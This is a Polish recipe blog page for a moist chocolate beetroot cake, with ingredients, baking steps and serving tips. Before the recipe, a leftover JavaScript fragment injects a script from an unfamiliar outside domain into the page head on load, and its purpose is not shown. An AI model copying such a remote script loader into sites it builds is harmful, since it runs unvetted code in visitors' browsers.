, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Ciasto czekoladowe „Czerwony buraczek”

Wydrukuj artykuł Wydrukuj artykuł

Ciasto czekoladowe "Czerwony buraczek"

Burak + czekoladowe ciasto, zaskakujące  połączenie, lecz jakże udane :) spróbujcie, naprawdę warto!

Kolor ciasta pięknie czekoladowy, konsystencja miękka, lekko wilgotna, w połączeniu z polewą z czekolady – smakuje wyśmienicie! Skorzystałam z przepisu Peti autorki czerwieniblekit.blox.pl, wprowadzając małe modyfikacje.

Składniki:

  • 3 jajka
  • 150 g cukru
  • 80 ml oleju
  • 1/2 łyżeczki sody oczyszczonej
  • 1/2 łyżeczki proszku do pieczenia
  • 100 g mąki
  • 2 łyżki kakao
  • 50 g ulubionej czekolady (rozpuszczonej w mikrofalówce, lub w kąpieli wodnej)
  • 50 g mielonych migdałów
  • 250 g surowych buraków startych na drobnych oczkach
  • 6 g cukru waniliowego
  • masło i otręby żytnie do przygotowania formy do pieczenia (otręby można zastąpić bułką tartą)

Polewa:

  • około 200 g ulubionej czekolady

Jajka ubić z cukrem i olejem do uzyskania kremowej masy. Następnie stopniowo dodać cukier waniliowy, przesianą mąkę, sodę, proszek do pieczenia i mielone migdały – wymieszać łyżką. Ze startych buraków odcisnąć nadmiar soku (dodałam bez odciskania) i dodać je do ciasta wraz z roztopioną czekoladą i kakao – wymieszać łyżką.

Ciasto można piec w podłużnej keksówce lub małej tortownicy smarując je wcześniej masłem i posypując otrębami żytnimi lub tradycyjnie bułką tartą. Ja piekłam w blaszce na 6 małych keksów w temp. 180°C przez około 40 minut. Gdy ostygły posmarowałam je roztopioną czekoladą i ozdobiłam słodyczami.

Przygotowując ciasto, można dodać do niego kawałki orzechów włoskich lub suszonych śliwek – świetnie pasują:)

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony